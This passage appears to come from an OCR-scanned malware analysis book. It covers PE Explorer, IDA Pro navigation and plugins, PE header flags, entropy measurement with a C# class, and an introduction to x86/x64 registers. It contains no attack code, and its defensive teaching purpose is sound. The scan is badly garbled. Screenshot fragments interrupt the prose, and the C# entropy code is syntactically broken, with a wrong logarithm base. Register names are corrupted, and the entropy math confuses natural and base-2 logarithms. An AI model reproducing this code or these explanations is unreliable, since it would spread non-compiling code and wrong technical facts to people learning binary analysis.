?8GGF7DC _XcptFilter 
78G0B908 _exit 

78014407 isalnun 

78614357 isxdigit 
78025410 sscanf 

780127CE strchr 

7880231A strncpy 

78812927 strpbrk 

78612961 _stricmp 





The /DISASM option produces an acceptable 
disassembly of the code with the : bytes 


(default) or :nobytes option to display the hex 
opcodes or just the assembly mnemonic listings; 
you need to type the following line of code to 
display just the assembly listing: 


dumpbin /diasm:nobytes<filename> 


With an array of essential tools at your disposal, 
you may think that it would be redundant to 
have tools that can implement possibly much of 
the available toolset. In the good old days, 
reverse engineering started with plain Jane 
developmental tools such as basic debuggers, 
printouts, and paper and pencil. Notwithstanding 
the culture of homegrown tools by the 
underground elite, as the industry developed 
over the years, specialized tools (free and 
commercial) started being developed as a result 
of R&D. We will discuss two such tools for our 
purposes of a static analysis of a binary 
executable and incorporate disassembly analyses 
in the equation: 


- PE Explorer: This is a lightweight doppelganger of IDA 
Pro with a lower price tag but having a similar feature set 
and possibly a more integrated feature set, while not as 
extensive as IDA Pro. 


A relative new comer with good looking prospects is 
available at https://www.relyze.com, which provides much 
of the features you would expect from IDA Pro albeit in a 
more streamlined interface. 


You can also check out Hopper disassembler if you are 
reverse engineering on MacOSX which also does PE files 
and has a very unique well designed feel to it. Visit 
http://hopperapp.com for more. 


e IDA Pro: The industry standard for binary reverse 
engineering. We will cover scenarios and the multitude 
ways of analyzing native binaries by using it. 


Exploring the 
universe of binaries 
on PE Explorer 


PE Explorer from Heaventools (Germany/Canada) 
is a well-featured toolkit for a static analysis of 
the following PE file format extensions in 
Windows—EXE, DLL, SYS, DRV, MSSTYLE, CPL, 
OCX, BPL, DPL, SCR, and FLT—and Windows CE 
binaries. The GUI is intuitive and not at all 
complicated. The approach here is that every 
aspect of a PE binary has its own separate view. 
The price tag of $129 offsets any perceived 
deficiencies as the disassembler is very capable 
and the exploded view provided of a PE file is 
second to none. However, there is no debugger 
and the code cannot be edited (you can use an 
external hex editor), so dynamic analysis is not 
an option, which in the right situation, maybe 
exactly what you need. The basic editing features 
are only provided for the header flags and 
timestamps. 


The HEADERS INFO, DATA DIRECTORIES, and 
SECTION HEADERS toolbar items (the View 
menu) display each item in a tabular 
arrangement. In the figure, notice the value in 
the Real Image Checksum textbox and the 
Checksum field value in the right-most pane of 
0x0002BC86. This is the link checksum value 
inserted by the linker; the real checksum is 
calculated during the load time of DLLs or system 
drivers by the Windows loader to check memory 
integrity. In general, any discrepancies result in 
discarding the particular instance. 
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Description A 


Reserved 
163840 bytes 


Win32 GUI 


When the Editor (Ctr/+ Shift+ P) button in the 
Characteristics column is clicked on, an edit 
dialog enumerates the flags for this field. 


Characteristics 


0x0001 Relocation information is stripped from the file 
Ox0002 The file is executable (no unresolved extemal references) 
0x0004 Line numbers ate stripped from the file 
00008 Local symbols are stripped from the file 
[| 00010 Aggressively tim the working set 
[-] 0x0020 The application can handle addresses larger than 2 GB 
é of this flag is reserved for future use 
Bytes of word are reversed (REVERSED_LO) 
Computer supports 32-bit words 
Debugging information is stored separately in a .dbg file 
If the image is on removable media, copy and run from the swap file 
If the image is on the network, copy and run from the swap file 
The file is a system file such as a driver 
The file is a dynamic link library (DLL) 
File should be run only on a uniprocessor computer 
Bytes of the word are reversed (REVERSED_HI) 


All the flag values are OR'ed (each value is 
different, so the binary patterns just fall in place 
with respect to their respective position in order 
to resemble a composite binary pattern) to get 
the final value in hexadecimals in order to 
communicate to the Windows loader of the 
required values in the binary header field. Some 
values are of special importance to us for 
malware analysis; 0x2000 signifies that the file is 
a dynamic link library (DLL), and conversely, 
0x0002 signifies that the file is an executable (no 
unresolved external references), which is an EXE 
file in this instance. Ox1000 would signify that 
the file is a system file, such as a driver (. Sys). 
The remaining flags are also important, and they 
convey the validity of the executable to Windows, 
such aS memory usage of more than 2 GB and 





swap file usage if the file image is on removable 
media or the network, among others. 


Export tables and import tables are described in 
a Similar fashion. Integrated Quick Function 
Syntax Lookup is a great feature for both 
learning and investigating standard Windows 
APIs, instead of spending time with manual 
lookups. Authenticode Digital Signature 
Viewer is a feature to verify the authenticity of 
the publisher via a certificate-based digital 
signature. A very handy Resource Editor is also 
provided. 


The disassembler (Ctr/+ M, Tools | 
Disassembler) opens in its own window and 
overlaps the main interface, which can be 
toggled back anytime. 
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Name List to the right provides a list of labeled 
addresses (including conditional and 
unconditional branching destinations, function 
prologues, named data, and string references) by 
the disassembler, with the entry point clearly 
indicated. Labels can be renamed by pressing N 
(Edit | Rename Label). 


The lower left tabs View 1, View 2, View 3, and 
View 4 (F6, F7, F8, and F9) provide persistent 
disassemble views that are independent of the 
main view and are swappable. 


The Strings tab provides a list of detected 
strings; you can further manipulate strings 
detection by using the toolbar, using menu items 
(Edit | Mark as String/Pascal String/Long 
Pascal String/Unicode), or pressing S, A, L, or U 
to activate each of them. 


Code can be manually marked in the assembly 
listing by pressing 'C.' Dwords and offsets can 
be marked by pressing Dand O, respectively. 


Comments can be entered by pressing ;. 


The unprocessed data tab displays some blocks 
of data that do not have a reference to a 
procedure. 


The main disassembly view is towards the top- 
left. A nice feature in this view is the provision for 
an immediate adjustment of the space between 
each assembly line (/ns and De/) and the number 
of opcodes per line (Shift+ Ins and Shift+ Del). 


Navigation is really simple. Branching addresses 
can be navigated by selecting the relevant line 
and pressing Enter. For instructions with a 
second operand destination address, press Ctr/+ 
Enter. Going back to a previous address requires 
pressing Esc, and to visit a particular address, 
you have press Ctr/+ Gand type the address in 
the hexadecimal format. 


Subroutines that might have references can be 
listed in a pop-up window by selecting the 
starting address of the procedure and pressing R 
(Search | References). The list can then be 
traversed by double-clicking on each listed 
address. 


Automatic unpacking is done for UPX, NSPACK, 
and WinUPack, and the file can be saved 
unpacked to the file system. 


The disassembler options (View | Disassembler 
Options) provide with a list of instruction sets to 
disassemble for. The checked Auto Rescan 
option and Auto Rescan count value are fine at 
default values, but for complicated binaries, they 
may require more passes. The number of 
displayed opcodes can be set to a default value. 


General Advanced 





[¥] Include MMX Instruction Set 

[¥| Include 3DNow! Instruction Set 
[¥] Include SSE Instruction Set 

[¥] Include SSE2 Instruction Set 
[¥| Include SSE3 Instruction Set 
[| Detect Segment Reaister Usage 





[¥|AutoRescan Auto Rescan count be 








[| Save Borland VCL Objects after Preload Step 








Number of displayed Opcode bytes: = 


StatNow Close = ‘Help 








The Advanced tab provides for settings that are 
fine as default. 


A dependency scanner (Ctr/ + WN) hierarchically 
lists out the external modules and library files 
that are requisite to a successful execution of the 
primary binary. 
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Path: E:\MAINZ\CODES\Mah\X-CaloulatorGold exe 


Version Info 














Info: VS VERSION INFO 
Signature: FEEFQABDh 
Struc Version: 1.0 

File Version: 1.1.0.0 

Product Version: 1.1.0.0 

File Flags Mask: 0.0 

File Flags: 

File 05: WINDOWS32 

File Type: TOW 

File SubType: — UNKNOW 

File Date: 00:00:00 00/00/0000 


Struc has Child(ren), Size: 588 bytes, 


Child Type: StringPileInfo 

Language/Code Page: 1033/1200 

CompanyName: Rudy Rooroh 

FileVersion: i 

FileDescription:  X-Calculator Gold 
LegalCopyright: Copyright @ 2006, Rudy Rooroh 
LegalTrademarks: Rudy Rooroh 





[| Always Resoan 





Getting to know IDA 
Pro 


With the tools that we have covered thus far, you 
must have a good idea of the workflow toolchain 
required for a static analysis. Let us now 
introduce ourselves to IDA Pro (The Interactive 
Disassembler) from Hex-Rays. The IDA Pro Book 
by Chris Eagle is a solid reference and guide book 
towards building mastery in IDA Pro and reverse 
engineering in general. Since there would not be 
too much use of regurgitating all of the IDA Pro- 
specific material and given the space constraints, 
we will go over the often-used features in IDA Pro 
and build familiarity with this tool. 


Upon opening a binary executable in IDA Pro 
(drag and drop in the Open menu), the Load a 
new file modal dialog pops up: 


: x 
Load file C; \Users\user \Desktop|\Learningaboutpointer. exe as 


Portable executable for $0386 (PE) [ 
MS-DOS executable (EXE) [dos.ldw] 
Binary file 


Processor type 


lintel 80x86 processors: metapc v | Set | 
Analysis 


Loading segment foxooo00000 


M Enabled 


Loading offset foxooo00000 V Indicator enabled 











Options 
WV Create seaments Kernel options 1 

T” Load resources 

|¥ Rename DLL entries 


I Manual load Kemel options 2 | 


MV Fil segment gaps 


M Make imports segment Processor options | 


[” Create FLAT group 


Dutdrectory [c:\Windws 
[ox] conet | teh | 


The binary format is parsed and identified by IDA 
Pro, and the correct loader is prompted as a 
Portable executable for 80836 (PE) [pe.Idw]. 
The binary file option can be used if you are 
working with a hex dump without a known 
header. IDA chooses to load only the code 
section, and if you need to work with the PE 
headers and resources, choose the manual load 
option and select Yes for every section that loads 
turn by turn. 














IDA Pro has two main views for working with 
disassembly listings, namely Text Mode and 


Graph Mode, both of which can be toggled via 
the Spacebar key. Graph Overview is an eagle's 
eye view of the current graph block. The rest of 
the tabs of significance include the Imports and 
Exports (when working with DLLs or uncommon 
EXE files with Exports) view. The IDAView-A tab 
and the Hex View-A tab can be synchronized 
(right-click | Synchronize with IDA View-A) such 
that selecting a hex offset in the hex view will 
result in the corresponding disassembly in the 
IDA view and the converse. Additional IDA views 
can be created via View | Open subviews | 
Disassembly. 
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Strings will be listed in a separate view and can 
be invoked using Ctr/+ F12 or via View | Open 
subviews | Strings. From the Options menu, 
the ASCII string style dialog (A/t+ A) can be 
invoked, which provides various string 
interpretation settings. 


Create a string now: Setup default string type: 


DOS style ($ terminated) | ( 2DOS style ( terminated) 

Pascal style (length byte) | ( 3 Pascal style (length byte) 
Wide pascal (length 2bytes) | 4 Wide pascal (length 2bytes) 

Delphi (length 4bytes) | 





5Delphi (length 4bytes) 


7 Unicode pascal (2bytes) 


Unicode pascal (2bytes) | 
Unicode wide pascal (4byt) | 
Character terminated | 

First termination character Ox0 


Second termination character Ox0 ¥ 
Current string encoding: Default (<no conversion >) 


Change encoding | Set default encodings | 
_ «| cont | tee | 


You can comment the disassembly by pressing ; 
and typing the comment in the popup text box. 


8 Unicode wide pascal (4byt) 


c 
c 
Unicode | (~ 6 Unicode 
CO 
‘2 
to 


9 Character terminated 














You can redefine the code in the disassembly by 
pressing U for undefining code, subroutines, or 
data. Press C for code representation and D for 
going back to data for the selected regions in the 
disassembly view to tell IDA Pro to analyze a 


particular byte sequence as code or as data. You 
can press Ato mark the raw bytes as ASCII 
strings. 


Right-clicking on an operand in the IDA view will 
enable you to swap the radix of a type from 
binary (B) to decimal or hexadecimal (H), and 
perform a NOT operation or a 2's complement 
operation on the value. The Use standard 
symbolic constant option opens a dialog where 
you can choose the named constants from the 
comprehensive collection available. 
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 ACMDRIVERDETAILS SUPPORTF DISABLED 
f ACM_DRIVERENUMF DISABLED 

Je ACTRL SYNCHRONIZE 

Ja ADDRESS.TAG BIT 

Ja ADS.AUTH RESERVED 

Jp ADS.GROUP_TYPE.SECURITY ENABLED 

fp ADS RIGHT. GENERIC. READ 

Ja ADS.SVSTEMFLAG DISALLOW. DELETE 
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Ja BINDINFO_OPTIONS. SHDOCVW.NAVIGATE 

Ja BSF_MSGSRV321SOK 

Ja CACHE.ENTRY MODIFY DATA FC 

Ja CAL.NOUSEROVERRIDE 

Jp CCM_INSERTIONPOINTID_MASK SHARED 

Jp CCM_INSERTIONPOINTID_ROOT. MENU 

Ja CERT.CHAIN, REVOCATION. CHECK. CACHE.ONLY 
Ja CERT EXCLUDED _SUBTREE. BIT 
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Ja CERT REGISTRY. STORE, CLIENT, GPT. FLAG 

Jy CERT.SET PROPERTY IGNORE PERSIST ERROR. FLAG 
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Quick view (Ctr/+ 1) is a nice linear listing of 
available views in a pop-up dialog through which 
you can invoke additional views. 


IB Disassembly 
©} Hex dump 
fw Pseudocode 


Shift+F4 
Shift+F3 

Shift+F12 
a) Segments Shift+F7 

Segment registers Shift+F8 

Selectors 

Signatures Shift+F5 

Gi) Type libraries Shift+F11 
Structures Shift+F9 

fF] Enumerations Shift+F10 
(3) Local types Shift+F1 

IF Cross references 

fa Notepad 

lal Problems 

Oy BinDiff Main Window 

Cy BinDiff Matched Functions 

Cy BinDiff Statistics 

| BinDiff Primary Unmatched 

of BinDiff Secondary Unmatched 


| oK | comet _| seach | te | 











Line 1 of 24 





The Functions view provides a listing of all 
detected functions in the binary, along with the 
function name string, start offset, and length in 
bytes. A set of flags denotes the type of function 
call (R/F/L/S/B/T) with L being library functions, 
which can be either marked for a vulnerability 
analysis or skipped for a regular malware analysis 
as your primary goal is the malware payload(s). 
You can right-click and choose Edit function to 
open a dialog box with different editable 


parameters. You can manually set the function as 
a BP-based frame or an SP-based frame. 


The frame pointer delta is for when the stack 
pointer is not aligned to its frame-based 
preparation value and is at an offset further from 
the original stack frame; while IDA Pro does its 
best to resolve such scenarios, you can amend 
any errant stack analysis on the basis of your 
knowledge and analysis of the stack delta value 
in hexadecimals. 
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A particular setting to do for a more informative 
disassembly is to set the number of opcodes for 
display in Options | General | IDA Options | 
Diassembly-Number of opcode bytes. 6 is an 
optimum value and covers most of the 
instruction opcode sequences for the x86/x64 
Intel CPUs. 





The File | Load File | Flirt Signature menu 
item provides a list of available compiler and 
library signatures that can be applied to the 


disassembly in order to sift through the 
boilerplate and standard known code and focus 
on the malware-specific code. FLIRT stands for 
Fast Library Identification and Recognition 
Technology, which is how IDA Pro nametags 
vendor-specific compiler assembly output and 
libraries and applies the templates as signatures 
to the loaded disassembly code. 


You can choose any one of them at a time and 
press OK to have it loaded into IDA Pro. 
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File | Produce File | Create ASM and Create 
LST are two nice options for taking out paper 
printouts of the LST listings file and the ASM 
assembler dump from IDA Pro. The uses are 
myriad, from automation building to manual note 
taking. If you have ever had the privilege to work 
with earlier disassemblers such as W32Dasm, 
you will feel right at home with this text dump- 
based format. 


Knowing your bearings in IDA 
Pro 


Navigation is quite intuitive and mainly done 
using double-clicks and scrollbars using the left- 
mouse button or the mouse middle scroll wheel. 
Going back to the previously visited addresses 
requires pressing the Esc key. Links (Subroutines 
and memory offsets such as the jxx/call 
destinations and the loc_XXXX destination 
labels) and Code XREF or Data XREF (also known 
as strings) (cross references for transporting to 
the cross-referencing item in the display) are the 
primary ways to navigate through code in IDA Pro 
by double-clicking on them. 


You can navigate through the history by using 
the backward and forward buttons and view the 
available items in the buffer via drop-down 
arrows. Alternatively, if you want to go toa 
specific address, you can press Gand type the 
virtual address or a named location in the box. 
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4 text:_printf: jmp ds:_imp_printf 
text:_tmainCRTStartup: mov edi, edi 
b text:_main+23: lea eax, [ebp+number] 


The navigation band is unique to IDA Pro as it is 
the only disassembler to implement this 
particular navigation control. 
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The yellow bar hanging from the top represents 
the current location in the IDA view. The teal- 
colored bands represent the FLIRT-recognized 


library code. Light pink denotes the imports 
section. Gray and brown indicate the defined and 
undefined data. Dark blue represents the user 
code. 


Pressing F12 (Flow Chart) and Ctr/+ F12 
(Function Calls) produces graphs that give an 
overview of the call sequences via cross 
references and possible pathways. 


X 


TFT ter GPA EXCEPTION-POLNTERSQ@@2 [_setuserter] nainthT Start 


terminategeYAKy2_0 __tnain(RTStartup — 





100% (15799108) 243 nodes, 112 edge segments, 15 crossings 





From the Graph menu or the right-click context 
menu in a function in the disassembly, you get 
the Xrefs from menu item, which analyzes all 


cross references (function calls and library calls) 
branching out from the current function. 
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Hooking up with IDA Pro 


The following image shows the IDA Pro Plugins 
group under Edit | Plugins: 





x86 Emulator Alt+F8 


Universal PE unpacker 


Sample plugin Alt+0 
Jump to next fixup Alt+F12 
Hex-Rays 

COM Helper 

Sample chart builder 

Change the callee address Alt+F11 
Universal Unpacker Manual Reconstruct 
zynamics BinExport 5 

zynamics BinDiff 4.0 Ctrl+6 





Quite a few plugins use a modifier to work within 
IDA, such as the x86 Emulator plugin (A/t+ F8) 
and zynamics BinDiff (Ctr/+ 6). 


Hex-Rays is a decompiler that cooks up a C code- 
like source representation from the disassembly. 

You need to select the required region and press 

5. 


To use zynamics BinDiff, you will need to copy 
the installation plugins to the IDA Pro plugins 
folder. Thereafter, upon restarting IDA Pro, the 
plugin appears in the Plugin menu. Pressing Ctr/ 
+ 6 brings up a Diff database load dialog box for 
the secondary database to load in order to 
compare to the current one already loaded in IDA 
Pro. You get the statistics and listings for the 
matched and unmatched functions in new tabs. 


Thereafter, to view the flow graph in the 
zynamics GUI from IDA Pro, press Ctr/+ E, which 
will open the zynamics BinDiff GUI with the flow 
graphs loaded for a structural and semantic 
comparison. 
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In the preceding figure, the Matched Functions 
tab displays the various post analysis parameters 
such as the EA primary (Effective Addresses of 
the first file), EA secondary, similarity, and 
confidence; these are values that are normalized 
from 0.00 to 1.00 with higher values that reflect 
the degree of success of the matches. The other 
columns inform you of the matching algorithm 
used and the algorithm statistics such as the 
number of code instructions and edges in the 
detection algorithms (Edge flow graph MD 
Index/Hash matching/Call reference matching, 
Edge Callgraph MD Index, and Edges Proximity 
MD Index, among others). 


The zynamics BinDiff GUI can be invoked from 
the IDA plugin interface, which displays a dual 
pane interface for side-by-side comparisons of 
the call graphs with a plethora of graph analysis 
options. It is highly recommended for complex 
malware analysis, pattern matching, signature 
creation, and generics analysis. 


Chris Eagle's x86 Emulator is certainly worth 
having a look at. The Step, Skip, Run, Run To 
Cursor, and Jump to Cursor buttons and the 
registers pane have a functionality similar to that 
of a debugger. Heap memory and stack memory 
can be emulated, and dumping from an 
emulated memory is supported, which would be 
good for manual unpacking. Breakpoints can be 
added and removed with a real-time display in 
the IDA Pro view. Function return values can be 
emulated. 


Threads can be switched. The Bochs debugger is 
a welcome addition to an emulated dynamic 
analysis, which can be found in the Debugger 
menu. 
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Entropy 


The byte distribution of any binary file in your 
computer has certain entropy to it. Entropy can 
be simply defined as a measure of disorder or 
uncertainty in a given system. 


To explain the value of this metric in more 
simplistic terms, since file (binary/text) structures 
follow a set template for the most part, the data 
structures associated with it develop certain 
expected patterns. The rules that give the file 
meaning to its parser or parent software expect 
grammar rules to be followed. However, if the 
data structure is random and does not follow a 
set sequence, the rules that expect the structure 
in sequence will fail to validate the input stream 
(series of bytes). This incoherence or discrepancy 
will be directly proportional to the entropy of the 
file or the selected regions thereof. This would 
mean that the file is either filled with junk and 
random data or a custom format, or the data is 
corrupted or packed, compressed or encrypted, 
or any combination thereof. However, as more 
information can be accumulated with such 
systems, the sample data can be used to reduce 
the entropy and deal with failure conditions by 
an analysis of the input and getting a clearer 
scope of the sample parameters. 


A byte probability distribution is a sum of the 
probabilities of each byte occurring in the entire 
file. A byte can have values from 0 to 255 in 
decimals. Notated in hexadecimals, the values 
are from 0x00 to OxFF. The probability of each 
byte occurring in the file stream is as follows: 


P(b) = total count of individual byte value 
occurrences in the file/total number of bytes in 
the file 


Taking the sigma (or summation) of each of these 
probabilities and mapping or normalizing the 
value to a negative logarithmic scale gives us a 
value from 0.0 to 8.0 when calibrated to mean 
the 8 bits used to encode a byte, or the number 
of bits required to represent a byte in the current 
data stream. 


Entropy = -Sigma(0 to N samples){ P(b) * In 
(P(b))} 


The values can be in fractions as well. The 
negative of the logarithm is taken to remove the 
negative sign for base 2 log values of negative 
powers. /n(1/8) = -3 because 1/(2~* 3) = 2~*-3. 
Probabilities will normally be between 0 and 1, 
unless the data expected has a probability of 1, 
such as a data input stream where each byte 
occurs with equal probability. Say for a length of 
a byte input stream of size 256, where every 
byte from 0-255 occurs exactly once, you have a 
per byte equal probability of 1/256. 


We know that Log2 (1/256) = Ln(1/256)/Ln(2) = 
-8 


For each byte, the value of the expression 
{ P(b)*In(P(b))} will be -(1/256*8). 


Perform a sigma operation as follows: -1 * 256 * - 
(1/256 * 8) = 8. Now that we know the 
significance of the negative sign, we can say that 
the entropy is 8. Information theory-wise, it would 
mean that the file has a lot of information. 
However, for our purposes, this file certainly has 
no defining structure, other than the fact that the 


distribution is anomalously uniform and contains 
all the information that it can have in a file, or all 
events have occurred that could occur within the 
range of possible events. 


A base 2 logarithm is the number of bits 
(information units) that are required to represent 
or distinguish n number of states/symbols. It 
boils down to permutation and statistical metrics 
represented in another more compact manner. 


The following is the code in C#, which is a class 
that gives the entropy value as a string. The 
class exports a static method, and hence, there 
is no need to make an instance in an OOP 
paradigm; further, it can be used in any of the 
. NET-supported languages. 


The method can be called using the following: 


string value=Entropy.GetEntropy(<byte 
array of the input file>); 


You need to pass the byte array of the input file. 


In C#, you can use the File class and the 
ReadALLBytes() method that returns a byte 
array object. 


namespace ENTROPY 


{ 
class Entropy{ 


public static string GetEntropy(byte[] c) 
{ 
int[] numArray = newint[0x100]; 
byte[] buffer = c; 
ter (int a= 0; a= Oxieo: 
it+)//initialize each element to zero 

{ 

numArray[i] = 0; 


} 


for (int j = 0; j < (buffer.Length - 1); 
j++) //histogram of each byte 


{ 
int index = buffer[j]; 
numArray [index ]++; 

i 


int length = buffer.Length; 
float entropy = Of; 
for (int k = 0; k < 0x100; k++) 
€ 
if ((numArray[k] != 0) && (k != 0)) 
{ 
entropy += (- 
float.Parse(numArray[k].ToString()) / 
float.Parse(length.ToString())) * 
float.Parse(Math.Log( (double) 
(float.Parse(numArray[k].ToString()) / 
float.Parse(length.ToString())), 
20), MOString( )}3 
7 
li 


return entropy.ToString(); 
i 

is 

: 


Analyzing a sosex_64.zip from the 
http://www.stevestechspot.com/downloads/sosex 
_64.zip file will give you a value of 7.96, which is 
a very high entropy value. You can read more on 
building a visualizer component in C# for an 
entropy analysis at 
http://resources.infosecinstitute.com/building- 
custom-controls-in-c-part-1/. 


Some range normalizing or scaling methods 
compact the range of values from 0 to 1 and can 
be used in probability distributions. Taking a 
reciprocal is one of the most common and 
simplest methods with the other variants 
working on the mathematical properties of e to 
map to sigmoid or hyperbolic curves on a plot: 


Sigmoid (X)= 1/(1+ e* -X) 


Hyperbolic(X) = (e* 2X -1 )V(/e*~ 2X+ 1) 
Reciprocal (X) = 1/X 


Visit the following links to learn more about 
them: 


e https://en. wikipedia. org/wiki/E_(mathematical_constant) 
e https://en.wikipedia.org/wiki/Sigmoid_function 
e https://en.wikipedia.org/wiki/Hyperbolic_function 


For our purposes, the final value represents the 
number of bits required to get information out of 
the input stream. If the value is high, the byte 
stream is most likely encrypted or obfuscated or 
is simply junk corrupted data, but you still need 
to differentiate it by using other analyses to 
complement the initial red flags. 


Entropy analysis is a very useful metric to detect 
compressed files, encrypted files, packed files, 
and obfuscated data, and hence, is 
indispensable to malware analysis and malware 
forensics. Compiled code rarely gives this kind of 
randomization as it follows strict grammar 
according to the source code text. Hence, when 
binary executables are tampered with or armored 
in any way, this simple metric can give away that 
fact. You can think of entropy as an anomaly 
detector for a given rule set for our purpose of 
malware analysis. 


Summary 


In this rather quick tour, you learned about 
number systems in depth and looked at how 
binary, hexadecimal, and decimal notation 
schemes work. You have also got a clear idea of 
how negative number representation methods 
and 1's complement and 2's complement 
representations work in computing. You 
examined what logic gates are and how bit 
masking works. 


You looked at the tool chain and some of the 
most useful tools that will immensely aid you in 
your static analysis tasks. You had a better look 
at PE Explorer and IDA Pro, as well as discussed 
the myriad ways in which the tools can be used. 
In the next chapter, we will take a deeper look at 
some of the important data structures and how 
to use a debugger and disassembler in tandem 
to get the best out of your analysis session. As 
we progress, you will also get to learn about 
debugger internals, a deeper exploration of 
malicious code, which will aid you in your 
antimalware pursuits. See you there! 


Chapter 2. Dancing 
with the Dead 


While many malware analysis tasks involve 
pattern recognition and investigation on an 
existing binary disassembly, the level of comfort 
while performing your tasks will be directly 
proportional to your ability to think and write in 
assembly code. How the compiler translates and 
arranges the source text in a final binary (object 
code) is a very different process (lexical parsing, 
tokenizing, data flow analysis, and control flow 
analysis) from a human expressing their ideas in 
a text form by using English code constructs. 
Furthermore, it's the linker (which is invoked by 
modern compilers) that actually builds the final 
executable binary from various libraries and 
other object code sources and resources. If 
assembly code such as the following does not 
make sense, this chapter could be of help: 


mov eax,dword ptr[0x402500] 
cdq 
sar eax,4 


Our focus for the current chapter will be the 
following: 


e x86/x64 assembly programming concepts using VC++ 
and MASM32 


e x86 disassembly and an analysis of binaries in VC++ 
2008 Express 


- Various ways to do assembly programming in the VC++ 
environment 


Motivation 


To be clear from the outset, it is actually the 
memory management work that takes up bulk of 
the work in assembly programming, not the 
instruction sequences themselves, which can be 
taken as enablers or the core vocabulary. Each 
instruction sequence is atomic, and like a set of 
symbols that have a singular meaning and 
purpose, very linear. Each instruction in the text 
form above is called a mnemonic, where each 
assembly instruction can be taken as a function 
with a certain requirement and output. 


Each assembly line is directly mapped to an 
opcode sequence consisting of byte patterns that 
are unique to a particular architecture, for our 
purposes, the 80x86 family of Intel 
microprocessors. This mapping is done by an 
assembler (having dual meaning of both the 
language and the software used to generate the 
machine object code), which creates object code 
from assembly text, which is then processed by 
the linker to get the final executable. 


Assembly code is, by definition, not portable as it 
varies for each microprocessor design. However, 
market share and the standards established over 
the years have made it redundant for Windows 
software analysis as the operating system runs 
mainly on Intel and AMD microprocessors. Other 
operating systems also run on the x86/x64 
instruction set, and thus, the Intel instruction set 
has become a convention. To summarize, the 
benefit of learning assembly is that all software 
on a platform eventually has to run in the form of 
microprocessor instructions, which is something 
like the popular saying that "all roads lead to 
Rome." This puts immense power in your hands 
as all and any software can be deconstructed to a 
good approximation, given enough time and 


resources. However, intractable issues arise as a 
result of binary compilation as the symbols and 
identifiers used to denote things such as variable 
names and function names become generic 
memory addresses and it takes some effort to 
create an approximate representation of the 
Original design. 


The Intel 64 and IA-32 architecture software 
developer's manual combined volumes 1, 2A, 2B, 
2C, 3A, 3B, and 3C is the best reference for the 
IA32 instruction set and for system programming 
for Intel chips; you can find it at https://www- 
ssl.intel.com/content/dam/www/public/us/en/docu 
ments/manuals/64-ia-32-architectures-software- 
developer-manual-325462.pdf. 


The Intel microprocessor 80x86 family is often 
called Complex Instruction Set Computer 
(CISC). The instruction opcodes are of variable 
length, and a singular opcode sequence 
(instruction) can perform a range of tasks 
depending on how it is invoked. This is unlike 
Reduced Instruction Set Computer (RISC) 
machines where the opcode lengths are not 
variable and a singular instruction opcode can 
execute with focus on a particular task, but it 
would require more instructions than a CISC 
machine to complete a similar task. Parallel 
processing is feasible on both designs with the 
debate continuing on which architecture is a 
better one. Hyper-threading technology, which 
basically enables multiple microprocessors to 
communicate with each other without the 
requirement of parallel instruction execution may 
hold the future for CISC as a design decision for 
software backward compatibility. 


The two important memory modes are the real 
mode (DOS) and the protected mode (Windows). 
The real mode maps to a 16-bit memory address 
space (1 MB) and the protected mode to a 32-bit 
address space (4 GB). The real mode is present 
for backward compatibility and enabled during 
the booting cycle of a computer after which it 
switches to the protected mode for modern 
operating systems such as the 32/64-bit 
Windows versions. 


Looking at the assembly code and the 
disassembly of the native code, some things are 
quite evident: 


« Data movement instructions are implemented to facilitate 
communication between the memory and I/O components 
and within its own faculties such as general/FPU registers 
and flags. 


e Conditional constructs are implemented using elementary 
decisions using logic. This, in turn, facilitates program 
control flow. 


- Basic arithmetic- and number representation-related 
instructions, as well as instructions for Boolean logic, give 
it a mathematical brain. 


64-bit programming is just an extension of 32-bit 
programming, and hence, it is mandatory that 
the 32-bit concepts are fully understood. 


There are 8 essential general-purpose registers in 
an Intel microprocessor: 








64 bit registers 


32 bit registers 
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Further, there are 8 additional registers for 64-bit 
programming: 





64 bit registers 





32 bit addressable 





Only lower 8 bit addressable 








Note that only the last 8 bits are accessible in 
these additional registers (no high-order byte) in 
addition to the 64-bit and 32-bit regions for 
memory addressing. 


Registers 


The microprocessor has a set of internal memory 
scratchpads called registers. These are divided 
into categories and sub-functions. For 32-bit 
designs, the general-purpose registers, or rather 
multipurpose registers, (E is for extended) are 
EAX, EBX, ECX, EDX, EBP, ESI, EDI, and ESP. Their 
16-bit counterparts are AX, BX, CX, DX, BP, Sl, Dl, 
and SP 


Four of them have the following 8-bit 
subdivisions, where H means High and L means 
Low: 


e AX = AH,AL 
« BX =BH,BL 
© CX =CH,CL 
e DX = DH,DL 


For 64-bit programming, the general-purpose 
registers are RAX, RBX, RCX, RDX, RBP, RSI, RDI, 
and RSP: 


e RAX (addressable as EAX/AX/AH/AL) plays the standard 
role of an accumulator. It is also used as the placeholder 
for the return value of a function call. All registers of this 
set are addressable in a 32/16/8-bit size as well. 


- RBX plays the standard role of base indexing during 
memory access. 


e« RCX is normally used as a counter. 


e« RDX is normally used for data operations during division 
and data type extensions using EAX during multiplication 
in tandem. 


e RBP is normally used as a base pointer. 
- RDI is used as the destination index. 
- RSI is used as the source index. 


- RSP is the stack pointer. 


There are 8 more general-purpose registers that 
can be used anyway: R8, RY, R1O, R11, R12, 
R13, R14, and R15. 


The bits 8-15 are not addressable for this set. 


Special-purpose registers 


RIP, EIP, and IP are the 64-, 32-, and 16-bit 
addressed instruction pointer registers, also 
called the program counters. These keep track 
of the address of the next instruction to be 
executed. 








64 bit registers 


32 bit registers 


16 bit registers 





The segment registers are CS, DS, ES, SS, FS, 
and GS. 


While segmented mode programming has 
deprecated since Windows took over and DOS 
became obsolete, these registers are there for 





backward compatibility. These segments are now 
explicitly maintained by the Windows operating 
system and the programmer has no need to 
access these parts manually, apart from a few 
exceptions: 


e CS stands for Code Segment 
- DS stands for Data Segment 
e ES stands for Extra Segment 
e SS stands for Stack Segment 


- FS is a general-purpose segment register that has a 
special purpose in Windows 


FS is used to access the Process Environment 
Block (PEB), which is a user mode process 
memory data structure that is abstracted from 
the EPROCESS kernel data structure. These data 
structures are like databases and information 
gold mines that maintain the various details 
pertaining to a process that is loaded by the 
Windows loader. fs: [0] contains the start of the 
Structured Exception Handling (SEH)-linked 
list data structure. fs:[18] points to the TEB or 
the Thread Environment Block. fs: [30] points to 
the PEB. More will be discussed in the chapters 
ahead as these are completely related to 
Windows internals. 


vies nim | 





To take a quick view while debugging your 
applications, you might be interested to see the 
PEB inside your debugger. Without going into 
Windbg (the Microsoft Kernel debugger) just yet, 
a simple way to see the contents is to use 
OllyDbg and type fs:[30] after pressing Ctril+ G 
in the memory window. You will reach an address 
that typically starts with Ox7X XX XX XX. There is 
a field called PEB.BeingDebugged, which the 
